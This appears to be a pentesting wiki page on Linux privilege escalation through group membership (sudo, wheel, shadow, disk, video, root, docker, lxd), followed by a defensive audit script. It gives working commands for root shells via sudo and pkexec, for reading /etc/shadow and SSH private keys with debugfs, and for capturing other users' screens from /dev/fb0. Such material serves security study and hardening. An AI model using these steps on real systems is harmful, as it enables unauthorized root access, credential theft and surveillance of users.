# Sudo/Admin Groups
2020-07-15 15:43:14 +00:00
2022-05-01 12:41:36 +00:00
## **PE - Method 1**
2020-07-15 15:43:14 +00:00
**Sometimes**, **by default \(or because some software needs it\)** inside the ** /etc/sudoers** file you can find some of these lines:
```bash
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# Allow members of group admin to execute any command
%admin ALL=(ALL:ALL) ALL
```

This means that any user who belongs to the **sudo** or **admin** group can **execute anything with sudo**. To become **root**, just run:

```text
sudo su
```

## PE - Method 2

Find all SUID binaries and check whether **pkexec** is one of them:

```bash
find / -perm -4000 2>/dev/null
```

If **pkexec** is a **SUID binary** and you belong to the **sudo** or **admin** group, you could probably execute binaries as sudo using **pkexec**.

Check the polkit local authority configuration:

```bash
cat /etc/polkit-1/localauthority.conf.d/*
```

There you will find which groups are allowed to execute **pkexec**. **By default**, on some Linux distributions the **sudo** and **admin** groups appear there.

To **become root**, execute:

```bash
pkexec "/bin/sh" #You will be prompted for your user password
```

If you try to execute **pkexec** and you get this **error message**:

```bash
Error executing command as another user: Not authorized
This incident has been reported.
```
```bash
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
```

**It is not because you lack permissions, but because you are connected without a GUI**, so no polkit authentication agent is available to your session. The workaround needs **2 different sessions**:

{% code title="session1" %}
```bash
echo $$ # Step 1: get the current PID
pkexec "/bin/bash" # Step 3: execute pkexec
# Step 5: if you authenticate correctly, you will have a root session
```
{% endcode %}

{% code title="session2" %}
```bash
pkttyagent --process <PID of session1> # Step 2: attach pkttyagent to session1
# Step 4: you will be asked in this session to authenticate to pkexec
```
{% endcode %}

# Wheel Group

**Sometimes**, **by default**, the **/etc/sudoers** file contains this line:

```text
%wheel ALL=(ALL:ALL) ALL
```

This means that any user who belongs to the **wheel** group can **execute anything with sudo**. To become **root**, just run:

```text
sudo su
```
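
The sudoers and polkit group grants described in Method 1, Method 2 and this section can be audited from the defender's side. The script below is an added example, not part of the original page: it lists accounts that belong to groups granted `ALL` in a sudoers file, groups listed as polkit `AdminIdentities`, and the other groups this page covers. The function names and the sample files are constructed for the illustration.

```shell
#!/bin/sh
# Added example (not from the original page): report which accounts sit in
# the groups this page discusses. All paths are arguments, so it can run on
# copies of the files; the sample data below is constructed.

# Groups covered in the later sections of the page (assumed list for this audit).
SENSITIVE_GROUPS="shadow disk video root docker lxd"

# Print groups that a sudoers file lets run ALL commands,
# e.g. "%sudo ALL=(ALL:ALL) ALL". Only by-name %group entries are handled.
sudoers_all_groups() {
    awk '
        /^[ \t]*#/ { next }
        $1 ~ /^%[^#:]/ && $NF == "ALL" { print substr($1, 2) }
    ' "$1" | LC_ALL=C sort -u
}

# Print unix groups that polkit treats as administrators, from lines such as
# "AdminIdentities=unix-group:sudo;unix-group:admin".
polkit_admin_groups() {
    awk -F= '
        $1 ~ /^[ \t]*AdminIdentities[ \t]*$/ {
            n = split($2, ids, ";")
            for (i = 1; i <= n; i++) {
                gsub(/^[ \t]+|[ \t]+$/, "", ids[i])
                if (sub(/^unix-group:/, "", ids[i])) print ids[i]
            }
        }
    ' "$@" 2>/dev/null | LC_ALL=C sort -u
}

# Print the supplementary members of one group from a group(5) file.
# Users who have the group as their primary GID appear only in passwd(5).
group_members() {   # $1 = group file, $2 = group name
    awk -F: -v g="$2" '
        $1 == g { n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] != "") print m[i] }
    ' "$1"
}

# Emit "<source> <group> <user>" for every member of the given groups.
report() {   # $1 = source label, $2 = group file, remaining args = groups
    label=$1; gfile=$2; shift 2
    for g in "$@"; do
        for u in $(group_members "$gfile" "$g"); do
            echo "$label $g $u"
        done
    done
}

# Usage: audit_privileged_groups SUDOERS GROUP_FILE [POLKIT_CONF...]
audit_privileged_groups() {
    sudoers=$1; groups_file=$2; shift 2
    {
        report sudoers "$groups_file" $(sudoers_all_groups "$sudoers")
        if [ $# -gt 0 ]; then
            report polkit "$groups_file" $(polkit_admin_groups "$@")
        fi
        report group "$groups_file" $SENSITIVE_GROUPS
    } | LC_ALL=C sort
}

# Constructed sample files for a dry run.
write_sample() {   # $1 = directory to write into
    printf '%s\n' '# constructed sudoers sample' \
        '%sudo  ALL=(ALL:ALL) ALL' '%wheel ALL=(ALL:ALL) ALL' \
        '%backup ALL=(root) /usr/bin/rsync' > "$1/sudoers"
    printf '%s\n' '[Configuration]' \
        'AdminIdentities=unix-group:sudo;unix-group:admin' > "$1/polkit.conf"
    printf '%s\n' 'root:x:0:' 'sudo:x:27:alice' 'admin:x:115:' 'wheel:x:10:bob' \
        'shadow:x:42:' 'disk:x:6:carol' 'video:x:44:alice,dave' \
        'docker:x:998:bob' 'backup:x:34:erin' > "$1/group"
}

# Dry run on the constructed sample.
demo_dir=$(mktemp -d)
write_sample "$demo_dir"
audit_privileged_groups "$demo_dir/sudoers" "$demo_dir/group" "$demo_dir/polkit.conf"
rm -rf "$demo_dir"
```

On a real host, run it as root with `/etc/sudoers`, `/etc/group` and the files under `/etc/polkit-1/localauthority.conf.d/`, and review every account it prints as if it already had root.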

# Shadow Group

Users from the **shadow** group can **read** the **/etc/shadow** file:

```text
-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
```

So, read the file and try to **crack some hashes**.

# **Disk Group**

This **privilege** is **equivalent to root access**, as you can **access** all the **data** inside the **machine**.

**Files**: `/dev/sd[a-z][1-9]`

```text
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
```

Note that debugfs can also **write files**. For example, to copy `/tmp/asd1.txt` to `/tmp/asd2.txt`:

```bash
debugfs -w /dev/sda1
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
```

**However, if you try to write files owned by root** (like `/etc/shadow` or `/etc/passwd`) you will have a "**Permission denied**" error.

# Video Group

Using the command `w` you can find **who is logged on the system** and it will show an output like the following one:
```bash
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
yossi    tty1                      22:16    5:13m  0.05s  0.04s -bash
moshe    pts/1    10.10.14.44      02:53   24:07   0.06s  0.06s /bin/bash
```

**tty1** means that the user **yossi** is logged in **physically** at a terminal on the machine.

The **video** group has access to the **screen output**, so its members can observe the screens. To do that, grab the current image on the screen as **raw data** and get the **resolution** that the screen is using. The screen data can be read from `/dev/fb0`, and the resolution of the screen is in `/sys/class/graphics/fb0/virtual_size`:

```bash
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
```

To open the **raw image** you can use **GIMP**: select the **`screen.raw`** file and choose **Raw image data** as the file type:

![](../../.gitbook/assets/image%20%28208%29.png)

Then modify the **Width** and **Height** to the ones used by the screen and check the different **Image Types** (select the one that shows the screen best):

![](../../.gitbook/assets/image%20%28295%29.png)

# **root Group**

By default, **members of the root group** may be able to **modify** some **service configuration files**, **libraries** or **other interesting things** that could be used to **escalate privileges**...

**Check which files root group members can modify**:

```bash
find / -group root -perm -g=w 2>/dev/null
```

# Docker Group

You can mount the root filesystem of the host machine to an instance's volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine.

{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}

# lxc/lxd Group

[lxc - Privilege Escalation](lxd-privilege-escalation.md)